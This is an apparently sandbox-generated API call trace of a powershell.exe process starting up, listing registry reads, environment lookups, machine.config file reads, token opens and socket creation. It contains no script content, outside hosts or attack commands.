	[0802.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xed738 | out: phkResult=0xed738*=0x35c) returned 0x0
	[0802.179] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xed6bc, lpData=0x0, lpcbData=0xed6b8*=0x0 | out: lpType=0xed6bc*=0x0, lpData=0x0, lpcbData=0xed6b8*=0x0) returned 0x2

Thread:
	id = 423
	os_tid = 0x1088


Thread:
	id = 426
	os_tid = 0x1094


Thread:
	id = 1015
	os_tid = 0x1afc


Thread:
	id = 1021
	os_tid = 0x1b1c


Thread:
	id = 1054
	os_tid = 0xd08


Thread:
	id = 1079
	os_tid = 0x152c


Thread:
	id = 1096
	os_tid = 0x1644

	[0562.301] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.604] RegCloseKey (hKey=0x308) returned 0x0
	[0642.604] RegCloseKey (hKey=0x310) returned 0x0
	[0642.605] RegCloseKey (hKey=0x30c) returned 0x0
	[0737.294] LocalFree (hMem=0x307310) returned 0x0
	[0737.294] RegCloseKey (hKey=0x31c) returned 0x0
	[0737.295] LocalFree (hMem=0x307340) returned 0x0
	[0737.295] CloseHandle (hObject=0x310) returned 1
	[0737.295] CloseHandle (hObject=0x13) returned 1
	[0737.296] CloseHandle (hObject=0xf) returned 1
	[0751.219] RegCloseKey (hKey=0x310) returned 0x0
	[0784.252] RegCloseKey (hKey=0x378) returned 0x0
	[0784.252] RegCloseKey (hKey=0x3b4) returned 0x0
	[0784.252] RegCloseKey (hKey=0x394) returned 0x0
	[0784.253] RegCloseKey (hKey=0x390) returned 0x0
	[0784.253] RegCloseKey (hKey=0x38c) returned 0x0
	[0784.253] RegCloseKey (hKey=0x388) returned 0x0
	[0784.254] RegCloseKey (hKey=0x384) returned 0x0
	[0784.254] RegCloseKey (hKey=0x380) returned 0x0
	[0784.254] RegCloseKey (hKey=0x37c) returned 0x0
	[0784.254] RegCloseKey (hKey=0x354) returned 0x0
	[0784.255] RegCloseKey (hKey=0x3b0) returned 0x0
	[0784.255] RegCloseKey (hKey=0x3ac) returned 0x0
	[0784.255] RegCloseKey (hKey=0x374) returned 0x0
	[0784.255] RegCloseKey (hKey=0x370) returned 0x0
	[0784.256] RegCloseKey (hKey=0x36c) returned 0x0
	[0784.256] RegCloseKey (hKey=0x368) returned 0x0
	[0784.256] RegCloseKey (hKey=0x364) returned 0x0
	[0784.256] RegCloseKey (hKey=0x360) returned 0x0
	[0784.257] RegCloseKey (hKey=0x35c) returned 0x0
	[0784.257] RegCloseKey (hKey=0x358) returned 0x0
	[0784.257] RegCloseKey (hKey=0x3a8) returned 0x0
	[0784.258] RegCloseKey (hKey=0x348) returned 0x0
	[0784.258] RegCloseKey (hKey=0x344) returned 0x0
	[0784.258] RegCloseKey (hKey=0x340) returned 0x0
	[0784.258] RegCloseKey (hKey=0x33c) returned 0x0
	[0784.259] RegCloseKey (hKey=0x338) returned 0x0
	[0784.259] RegCloseKey (hKey=0x334) returned 0x0
	[0784.259] RegCloseKey (hKey=0x330) returned 0x0
	[0784.259] RegCloseKey (hKey=0x32c) returned 0x0
	[0784.260] RegCloseKey (hKey=0x3a4) returned 0x0
	[0784.260] RegCloseKey (hKey=0x31c) returned 0x0
	[0784.260] RegCloseKey (hKey=0x310) returned 0x0
	[0784.260] RegCloseKey (hKey=0x3a0) returned 0x0
	[0784.261] RegCloseKey (hKey=0x39c) returned 0x0
	[0837.353] RegCloseKey (hKey=0x35c) returned 0x0
	[0897.230] CloseHandle (hObject=0x3b0) returned 1
	[0897.231] CloseHandle (hObject=0x37c) returned 1
	[0897.231] CloseHandle (hObject=0x374) returned 1
	[0897.239] CloseHandle (hObject=0x3ac) returned 1
	[0897.240] CloseHandle (hObject=0x354) returned 1
	[0897.240] CloseHandle (hObject=0x35c) returned 1
	[0923.224] CertFreeCRLContext (pCrlContext=0x1cd0c6a0) returned 1
	[0923.225] CertFreeCRLContext (pCrlContext=0x1b710bb0) returned 1
	[0923.226] CloseHandle (hObject=0x4b0) returned 1
	[0923.226] CloseHandle (hObject=0x380) returned 1
	[0923.227] CertCloseStore (hCertStore=0x2fccb0, dwFlags=0x0) returned 1
	[0923.227] CertFreeCRLContext (pCrlContext=0x1b710bb0) returned 1
	[0923.227] CloseHandle (hObject=0x4a0) returned 1
	[0923.228] CloseHandle (hObject=0x49c) returned 1
	[0923.228] CloseHandle (hObject=0x44c) returned 1
	[0923.229] CertFreeCRLContext (pCrlContext=0x1b710c30) returned 1
	[0923.229] CloseHandle (hObject=0x448) returned 1
	[0923.233] CertFreeCRLContext (pCrlContext=0x1cd0c720) returned 1
	[0923.233] CloseHandle (hObject=0x3f0) returned 1
	[0923.234] CloseHandle (hObject=0x3ec) returned 1
	[0923.235] CloseHandle (hObject=0x388) returned 1
	[0923.235] CloseHandle (hObject=0x384) returned 1
	[0923.236] CloseHandle (hObject=0x3b0) returned 1
	[0923.236] CloseHandle (hObject=0x37c) returned 1
	[0923.236] CloseHandle (hObject=0x374) returned 1
	[0923.237] CloseHandle (hObject=0x35c) returned 1

Thread:
	id = 1162
	os_tid = 0x1698


Thread:
	id = 1698
	os_tid = 0x23c0

	[0803.059] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0803.065] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0803.070] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.070] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.072] VirtualQuery (in: lpAddress=0x1c5bdc40, lpBuffer=0x1c5beb00, dwLength=0x30 | out: lpBuffer=0x1c5beb00*(BaseAddress=0x1c5bd000, AllocationBase=0x1bc30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.085] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.085] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.088] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.088] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.896] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.896] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.914] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.914] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.917] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.917] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.920] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.920] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.925] VirtualQuery (in: lpAddress=0x1c5bdef0, lpBuffer=0x1c5bedb0, dwLength=0x30 | out: lpBuffer=0x1c5bedb0*(BaseAddress=0x1c5bd000, AllocationBase=0x1bc30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.926] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.926] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.929] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.929] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.929] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.929] CoTaskMemFree (pv=0x1b6e38a0) 
	[0803.931] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0803.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.931] CoTaskMemFree (pv=0x1b6e38a0) 
	[0805.059] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0805.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.059] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.093] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.093] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.095] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.096] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.097] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.097] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.816] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.816] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.818] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.818] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.820] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.820] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.822] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.822] CoTaskMemFree (pv=0x1b6e38a0) 
	[0806.840] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0806.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.840] CoTaskMemFree (pv=0x1b6e38a0) 
	[0808.277] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0808.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.277] CoTaskMemFree (pv=0x1b6e38a0) 
	[0808.281] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0808.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.281] CoTaskMemFree (pv=0x1b6e38a0) 
	[0808.285] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0808.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.285] CoTaskMemFree (pv=0x1b6e38a0) 
	[0808.289] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0808.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.289] CoTaskMemFree (pv=0x1b6e38a0) 
	[0857.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5bd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0857.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5bd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0857.399] CoTaskMemAlloc (cb=0x20c) returned 0x3bd9d0
	[0857.399] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3bd9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0857.399] CoTaskMemFree (pv=0x3bd9d0) 
	[0857.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c5bd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0858.369] GetCurrentProcess () returned 0xffffffffffffffff
	[0858.369] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd888 | out: TokenHandle=0x1c5bd888*=0x35c) returned 1
	[0858.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c5bd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0858.375] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5bd930 | out: lpFileInformation=0x1c5bd930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0873.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c5bd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0873.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5bd8e0 | out: lpFileInformation=0x1c5bd8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0886.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c5bd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0886.269] SetErrorMode (uMode=0x1) returned 0x1
	[0886.269] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3ac
	[0886.270] GetFileType (hFile=0x3ac) returned 0x1
	[0886.270] SetErrorMode (uMode=0x1) returned 0x1
	[0886.270] GetFileType (hFile=0x3ac) returned 0x1
	[0886.273] GetFileSize (in: hFile=0x3ac, lpFileSizeHigh=0x1c5bd8d8 | out: lpFileSizeHigh=0x1c5bd8d8*=0x0) returned 0x622a
	[0886.864] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd7f8*=0x1000, lpOverlapped=0x0) returned 1
	[0888.080] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd328, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd328*=0x1000, lpOverlapped=0x0) returned 1
	[0888.081] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd328, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd328*=0x1000, lpOverlapped=0x0) returned 1
	[0888.081] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd328, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd328*=0x1000, lpOverlapped=0x0) returned 1
	[0888.081] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd328, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd328*=0x1000, lpOverlapped=0x0) returned 1
	[0888.089] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd468, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd468*=0x1000, lpOverlapped=0x0) returned 1
	[0888.089] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd2e8*=0x22a, lpOverlapped=0x0) returned 1
	[0888.942] ReadFile (in: hFile=0x3ac, lpBuffer=0x2f00128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5bd388, lpOverlapped=0x0 | out: lpBuffer=0x2f00128*, lpNumberOfBytesRead=0x1c5bd388*=0x0, lpOverlapped=0x0) returned 1
	[0889.850] CloseHandle (hObject=0x3ac) returned 1
	[0891.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5bd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5bd7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.342] CoTaskMemAlloc (cb=0x20c) returned 0x3bd9d0
	[0891.342] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3bd9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0891.342] CoTaskMemFree (pv=0x3bd9d0) 
	[0891.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c5bd910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0891.343] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.343] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bdae8 | out: TokenHandle=0x1c5bdae8*=0x3ac) returned 1
	[0891.344] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.344] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bdae8 | out: TokenHandle=0x1c5bdae8*=0x374) returned 1
	[0891.346] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.346] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd888 | out: TokenHandle=0x1c5bd888*=0x3b0) returned 1
	[0891.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5bd930 | out: lpFileInformation=0x1c5bd930*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0891.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5bd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5bd8e0 | out: lpFileInformation=0x1c5bd8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0891.349] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.349] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bdae8 | out: TokenHandle=0x1c5bdae8*=0x354) returned 1
	[0891.350] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.350] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bdae8 | out: TokenHandle=0x1c5bdae8*=0x37c) returned 1
	[0891.369] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.369] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd768 | out: TokenHandle=0x1c5bd768*=0x380) returned 1
	[0897.873] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.873] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd768 | out: TokenHandle=0x1c5bd768*=0x35c) returned 1
	[0897.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354
	[0897.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac
	[0897.908] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.908] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd738 | out: TokenHandle=0x1c5bd738*=0x374) returned 1
	[0898.663] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.663] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd738 | out: TokenHandle=0x1c5bd738*=0x37c) returned 1
	[0898.675] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.675] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd678 | out: TokenHandle=0x1c5bd678*=0x3b0) returned 1
	[0898.686] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.686] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd678 | out: TokenHandle=0x1c5bd678*=0x384) returned 1
	[0899.362] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.362] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bdcb8 | out: TokenHandle=0x1c5bdcb8*=0x388) returned 1
	[0899.373] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5bbd78 | out: phkResult=0x1c5bbd78*=0x38c) returned 0x0
	[0899.373] RegQueryValueExW (in: hKey=0x38c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c5bbcfc, lpData=0x0, lpcbData=0x1c5bbcf8*=0x0 | out: lpType=0x1c5bbcfc*=0x1, lpData=0x0, lpcbData=0x1c5bbcf8*=0xe) returned 0x0
	[0899.373] CoTaskMemAlloc (cb=0x12) returned 0x2f6e00
	[0899.373] RegQueryValueExW (in: hKey=0x38c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c5bbccc, lpData=0x2f6e00, lpcbData=0x1c5bbcc8*=0xe | out: lpType=0x1c5bbccc*=0x1, lpData="Client", lpcbData=0x1c5bbcc8*=0xe) returned 0x0
	[0899.373] CoTaskMemFree (pv=0x2f6e00) 
	[0899.374] RegCloseKey (hKey=0x38c) returned 0x0
	[0899.383] CoTaskMemAlloc (cb=0xcd0) returned 0x1b715030
	[0899.384] RasEnumConnectionsW (in: param_1=0x1b715030, param_2=0x1c5bdd0c, param_3=0x1c5bdd08 | out: param_1=0x1b715030, param_2=0x1c5bdd0c, param_3=0x1c5bdd08) returned 0x0
	[0899.388] CoTaskMemFree (pv=0x1b715030) 
	[0899.399] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c5bdb18 | out: lpWSAData=0x1c5bdb18) returned 0
	[0900.125] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
	[0900.131] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.131] closesocket (s=0x3ec) returned 0
	[0900.131] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
	[0900.134] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.134] closesocket (s=0x3ec) returned 0
	[0900.140] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.140] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd398 | out: TokenHandle=0x1c5bd398*=0x3ec) returned 1
	[0900.152] GetCurrentProcess () returned 0xffffffffffffffff
